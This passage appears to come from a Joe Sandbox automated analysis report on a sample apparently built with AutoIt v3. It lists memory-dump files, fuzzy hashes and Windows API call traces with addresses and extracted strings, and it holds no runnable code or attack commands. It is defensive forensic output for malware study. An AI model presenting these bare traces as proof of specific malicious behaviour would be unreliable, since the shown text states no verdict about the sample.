• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction ID: a1ee8855d14357a6fd56bda423537445a14ada4ada0722e4b7790e4c3468147f
• Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
• Instruction Fuzzy Hash: D0C1B0322051A30EDF2E463ED47447EBAA15AA2BB171B076DD4B3CB4D6FF20D568D620
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction ID: b7a30175a7ae51a85e02bc1a848f981323bf261251fe5b8ce67b807b36109d09
• Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
• Instruction Fuzzy Hash: 61C18F322090930DDF2E463AC4744BEBAA15AA6BB571B077DD8B3CB5D5FF20C5A4D620
Memory Dump Source
• Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction ID: 10c54f1b12bc4f8b6d4e9ced043e56cb9a70b60e72b81e1e2d0b2bb991cfbd40
• Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
• Instruction Fuzzy Hash: 0F41A271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB90
Memory Dump Source
• Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction ID: 891faacdb0703049b2717927a732f86c8d199644a0f623203e626f1f4e6e9269
• Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
• Instruction Fuzzy Hash: 32019278E15109EFCB48DF98C5909AEF7B5FF48310F248599E819A7301E730AE41DB90
Memory Dump Source
• Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction ID: aa0c840f5803840529722121b8eec9c85c6ae91f356f8f58c891f8850e194f7c
• Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
• Instruction Fuzzy Hash: 1E019278E14109EFCB44DF98C5909AEF7B5FF48310F208599E819A7301E730AE41DB90
Memory Dump Source
• Source File: 00000000.00000002.2346669744.0000000000D44000.00000040.00000020.00020000.00000000.sdmp, Offset: 00D44000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d44000_mnXS9meqtB.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
• Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
• Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
APIs
• DeleteObject.GDI32(00000000), ref: 0035A2FE
• DeleteObject.GDI32(00000000), ref: 0035A310
• DestroyWindow.USER32 ref: 0035A31E
• GetDesktopWindow.USER32 ref: 0035A338
• GetWindowRect.USER32(00000000), ref: 0035A33F
• SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0035A480
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0035A490
• CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A4D8
• GetClientRect.USER32(00000000,?), ref: 0035A4E4
• CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0035A51E
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A540
• GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A553
• GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A55E
• GlobalLock.KERNEL32(00000000), ref: 0035A567
• ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A576
• GlobalUnlock.KERNEL32(00000000), ref: 0035A57F
• CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A586
• GlobalFree.KERNEL32(00000000), ref: 0035A591
• CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A5A3
• OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0038D9BC,00000000), ref: 0035A5B9
• GlobalFree.KERNEL32(00000000), ref: 0035A5C9
• CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0035A5EF
• SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0035A60E
• SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A630
• ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0035A81D
Strings
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
• Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
Similarity
• API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
• String ID: $AutoIt v3$DISPLAY$static
• API String ID: 2211948467-2373415609
• Opcode ID: 0b3ca38905802e787fa9445dc1b76a114424375de8f449f48e263ed91a8030e6
• Instruction ID: cd0bf24c3987efa0d82d0f29d34dafbca5af21b786bc834fb791ad8d542b597f
• Opcode Fuzzy Hash: 0b3ca38905802e787fa9445dc1b76a114424375de8f449f48e263ed91a8030e6
• Instruction Fuzzy Hash: B7028A75900218AFDB16DFA4DC89EAE7BB9FF49311F008258F905AB2A1D730ED41DB60
APIs
• SetTextColor.GDI32(?,00000000), ref: 0036D2DB
• GetSysColorBrush.USER32(0000000F), ref: 0036D30C
• GetSysColor.USER32(0000000F), ref: 0036D318
• SetBkColor.GDI32(?,000000FF), ref: 0036D332
• SelectObject.GDI32(?,00000000), ref: 0036D341
• InflateRect.USER32(?,000000FF,000000FF), ref: 0036D36C
• GetSysColor.USER32(00000010), ref: 0036D374
• CreateSolidBrush.GDI32(00000000), ref: 0036D37B
• FrameRect.USER32(?,?,00000000), ref: 0036D38A
• DeleteObject.GDI32(00000000), ref: 0036D391
• InflateRect.USER32(?,000000FE,000000FE), ref: 0036D3DC
• FillRect.USER32(?,?,00000000), ref: 0036D40E
• GetWindowLongW.USER32(?,000000F0), ref: 0036D439
  • Part of subcall function 0036D575: GetSysColor.USER32(00000012), ref: 0036D5AE
  • Part of subcall function 0036D575: SetTextColor.GDI32(?,?), ref: 0036D5B2
  • Part of subcall function 0036D575: GetSysColorBrush.USER32(0000000F), ref: 0036D5C8
  • Part of subcall function 0036D575: GetSysColor.USER32(0000000F), ref: 0036D5D3
  • Part of subcall function 0036D575: GetSysColor.USER32(00000011), ref: 0036D5F0
  • Part of subcall function 0036D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0036D5FE
  • Part of subcall function 0036D575: SelectObject.GDI32(?,00000000), ref: 0036D60F
  • Part of subcall function 0036D575: SetBkColor.GDI32(?,00000000), ref: 0036D618
  • Part of subcall function 0036D575: SelectObject.GDI32(?,?), ref: 0036D625
  • Part of subcall function 0036D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0036D644
  • Part of subcall function 0036D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0036D65B
  • Part of subcall function 0036D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0036D670
  • Part of subcall function 0036D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0036D698
Memory Dump Source
• Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 3521893082-0
                                                                            • Opcode ID: 432619662ac07ad13d18341d34196f3b11fde44eae68664e4a4519ebdb5d3de5
                                                                            • Instruction ID: 9f57adb180aba09191ad4ba2d28d5ac6e92059c9cab975144d90b61e37be8954
                                                                            • Opcode Fuzzy Hash: 432619662ac07ad13d18341d34196f3b11fde44eae68664e4a4519ebdb5d3de5
                                                                            • Instruction Fuzzy Hash: D791A072508301BFCB129F64DC48E6BBBADFF89325F104A19F962961E0DB71D944CB52
                                                                            APIs
                                                                            • DestroyWindow.USER32 ref: 0031B98B
                                                                            • DeleteObject.GDI32(00000000), ref: 0031B9CD
                                                                            • DeleteObject.GDI32(00000000), ref: 0031B9D8
                                                                            • DestroyIcon.USER32(00000000), ref: 0031B9E3
                                                                            • DestroyWindow.USER32(00000000), ref: 0031B9EE
                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0037D2AA
                                                                            • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0037D2E3
                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0037D711
                                                                              • Part of subcall function 0031B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0031B759,?,00000000,?,?,?,?,0031B72B,00000000,?), ref: 0031BA58
                                                                            • SendMessageW.USER32 ref: 0037D758
                                                                            • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0037D76F
                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0037D785
                                                                            • ImageList_Destroy.COMCTL32(00000000), ref: 0037D790
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                            • String ID: 0
                                                                            • API String ID: 464785882-4108050209
                                                                            • Opcode ID: ce54f4c97d6697eada203c91336a847e137811edf2d0c3b052323e14858cabd4
                                                                            • Instruction ID: 0dc0617fe30bdd5e57613dab1530dcccb9d50c7f4480dd403090c94d03590248
                                                                            • Opcode Fuzzy Hash: ce54f4c97d6697eada203c91336a847e137811edf2d0c3b052323e14858cabd4
                                                                            • Instruction Fuzzy Hash: E5129E74204201DFDB26CF28C884BA9BBF5FF49314F5585A9E989CB652C735EC82CB91
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0034DBD6
                                                                            • GetDriveTypeW.KERNEL32(?,0039DC54,?,\\.\,0039DC00), ref: 0034DCC3
                                                                            • SetErrorMode.KERNEL32(00000000,0039DC54,?,\\.\,0039DC00), ref: 0034DE29
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorMode$DriveType
                                                                            • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                            • API String ID: 2907320926-4222207086
                                                                            • Opcode ID: dd0805fe00b118e0237e1c7ae89f595a9df52d7bea96c8d538e7303a8175adae
                                                                            • Instruction ID: 16e9369d6b01ee94c4b1fed88b551412f3b41bdcee26c455893652ad72c35560
                                                                            • Opcode Fuzzy Hash: dd0805fe00b118e0237e1c7ae89f595a9df52d7bea96c8d538e7303a8175adae
                                                                            • Instruction Fuzzy Hash: B9519D30648312EBC607DF10C8A28A9B7E4FF96708B20591EF1479FAD5DA70F945DB42
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                            • API String ID: 1038674560-86951937
                                                                            • Opcode ID: 70a76963565b7df3ffb595c215b2275dc724de3a8478e91489309927743b8a7e
                                                                            • Instruction ID: 533c727e303f79bbd993daa919528758b450c41b6e7df12009e9cb160b73ada8
                                                                            • Opcode Fuzzy Hash: 70a76963565b7df3ffb595c215b2275dc724de3a8478e91489309927743b8a7e
                                                                            • Instruction Fuzzy Hash: 25814770641215BBDB37AB64DDA3FFF3768AF24300F055128F909AE5C6EB60DA41C2A0
                                                                            APIs
                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 0036C788
                                                                            • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0036C83E
                                                                            • SendMessageW.USER32(?,00001102,00000002,?), ref: 0036C859
                                                                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0036CB15
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: 0
                                                                            • API String ID: 2326795674-4108050209
                                                                            • Opcode ID: b37f0996451e5a4969c5d4ad5f66fff694c71971d0b54261d4f3d65fec3837d7
                                                                            • Instruction ID: fc9904e8aaffd5db94a82563d3b52b600b4b69c5498ccb6d26019e48cb2e3d3b
                                                                            • Opcode Fuzzy Hash: b37f0996451e5a4969c5d4ad5f66fff694c71971d0b54261d4f3d65fec3837d7
                                                                            • Instruction Fuzzy Hash: 62F1CF71214301AFD7228F24C889BBABBE8FF49314F08962DF5D9972A5C774D841DB92
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,0039DC00), ref: 00366449
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                            • API String ID: 3964851224-45149045
                                                                            • Opcode ID: fe6dd81b316728343f9e3a64bfb13ce773ec77c59ee661b9382a3e22aebeed0c
                                                                            • Instruction ID: 601c4ed263a349909a04d31a060bcf5943be6f75eb8e61a17063765ae8dcb110
                                                                            • Opcode Fuzzy Hash: fe6dd81b316728343f9e3a64bfb13ce773ec77c59ee661b9382a3e22aebeed0c
                                                                            • Instruction Fuzzy Hash: E4C1C6342043428BCB07EF10C552AAE7795AF99384F008858F9965F6E7DF31ED8ACB85
                                                                            APIs
                                                                            • GetSysColor.USER32(00000012), ref: 0036D5AE
                                                                            • SetTextColor.GDI32(?,?), ref: 0036D5B2
                                                                            • GetSysColorBrush.USER32(0000000F), ref: 0036D5C8
                                                                            • GetSysColor.USER32(0000000F), ref: 0036D5D3
                                                                            • CreateSolidBrush.GDI32(?), ref: 0036D5D8
                                                                            • GetSysColor.USER32(00000011), ref: 0036D5F0
                                                                            • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0036D5FE
                                                                            • SelectObject.GDI32(?,00000000), ref: 0036D60F
                                                                            • SetBkColor.GDI32(?,00000000), ref: 0036D618
                                                                            • SelectObject.GDI32(?,?), ref: 0036D625
                                                                            • InflateRect.USER32(?,000000FF,000000FF), ref: 0036D644
                                                                            • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0036D65B
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0036D670
                                                                            • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0036D698
                                                                            • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0036D6BF
                                                                            • InflateRect.USER32(?,000000FD,000000FD), ref: 0036D6DD
                                                                            • DrawFocusRect.USER32(?,?), ref: 0036D6E8
                                                                            • GetSysColor.USER32(00000011), ref: 0036D6F6
                                                                            • SetTextColor.GDI32(?,00000000), ref: 0036D6FE
                                                                            • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0036D712
                                                                            • SelectObject.GDI32(?,0036D2A5), ref: 0036D729
                                                                            • DeleteObject.GDI32(?), ref: 0036D734
                                                                            • SelectObject.GDI32(?,?), ref: 0036D73A
                                                                            • DeleteObject.GDI32(?), ref: 0036D73F
                                                                            • SetTextColor.GDI32(?,?), ref: 0036D745
                                                                            • SetBkColor.GDI32(?,?), ref: 0036D74F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                            • String ID:
                                                                            • API String ID: 1996641542-0
                                                                            • Opcode ID: 83372d842412a58990c9c22010110023fb64f81060dcf30c84126bf53a6db42e
                                                                            • Instruction ID: 7542f2bbea0fe3b3d9857a31734fce96b25f2b92b0b07d269cd128d016e188c5
                                                                            • Opcode Fuzzy Hash: 83372d842412a58990c9c22010110023fb64f81060dcf30c84126bf53a6db42e
                                                                            • Instruction Fuzzy Hash: FB514B71900208AFDF12AFA8DC48EAE7BB9FF49320F114155FA15AB2E1D7759A40DF50
                                                                            APIs
                                                                            • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0036B7B0
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0036B7C1
                                                                            • CharNextW.USER32(0000014E), ref: 0036B7F0
                                                                            • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0036B831
                                                                            • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0036B847
                                                                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0036B858
                                                                            • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0036B875
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0036B8C7
                                                                            • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0036B8DD
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 0036B90E
                                                                            • _memset.LIBCMT ref: 0036B933
                                                                            • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0036B97C
                                                                            • _memset.LIBCMT ref: 0036B9DB
                                                                            • SendMessageW.USER32 ref: 0036BA05
                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 0036BA5D
                                                                            • SendMessageW.USER32(?,0000133D,?,?), ref: 0036BB0A
                                                                            • InvalidateRect.USER32(?,00000000,00000001), ref: 0036BB2C
                                                                            • GetMenuItemInfoW.USER32(?), ref: 0036BB76
                                                                            • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0036BBA3
                                                                            • DrawMenuBar.USER32(?), ref: 0036BBB2
                                                                            • SetWindowTextW.USER32(?,0000014E), ref: 0036BBDA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2339124121.0000000000301000.00000020.00000001.01000000.00000003.sdmp, Offset: 00300000, based on PE: true
                                                                            • Associated: 00000000.00000002.2339103740.0000000000300000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.000000000038D000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339298773.00000000003AE000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339608412.00000000003BA000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2339678827.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_300000_mnXS9meqtB.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                            • String ID: 0
                                                                            • API String ID: 1073566785-4108050209
APIs
Strings
Similarity
• API ID: Window$Foreground
• String ID: ACTIVE$ALL$CLASS$H+;$HANDLE$INSTANCE$L+;$LAST$P+;$REGEXPCLASS$REGEXPTITLE$T+;$TITLE
• API String ID: 62970417-2354770990
APIs
• GetCursorPos.USER32(?), ref: 0036778A
• GetDesktopWindow.USER32 ref: 0036779F
• GetWindowRect.USER32(00000000), ref: 003677A6
• GetWindowLongW.USER32(?,000000F0), ref: 00367808
• DestroyWindow.USER32(?), ref: 00367834
• CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0036785D
• SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0036787B
• SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003678A1
• SendMessageW.USER32(?,00000421,?,?), ref: 003678B6
• SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003678C9
• IsWindowVisible.USER32(?), ref: 003678E9
• SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00367904
• SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00367918
• GetWindowRect.USER32(?,?), ref: 00367930
• MonitorFromPoint.USER32(?,?,00000002), ref: 00367956
• GetMonitorInfoW.USER32 ref: 00367970
• CopyRect.USER32(?,?), ref: 00367987
• SendMessageW.USER32(?,00000412,00000000), ref: 003679F2
Strings
Similarity
• API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
• String ID: ($0$tooltips_class32
• API String ID: 698492251-4156429822
APIs
• GetFileVersionInfoSizeW.VERSION(?,?), ref: 00346CFB
• GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00346D21
• _wcscpy.LIBCMT ref: 00346D4F
• _wcscmp.LIBCMT ref: 00346D5A
• _wcscat.LIBCMT ref: 00346D70
• _wcsstr.LIBCMT ref: 00346D7B
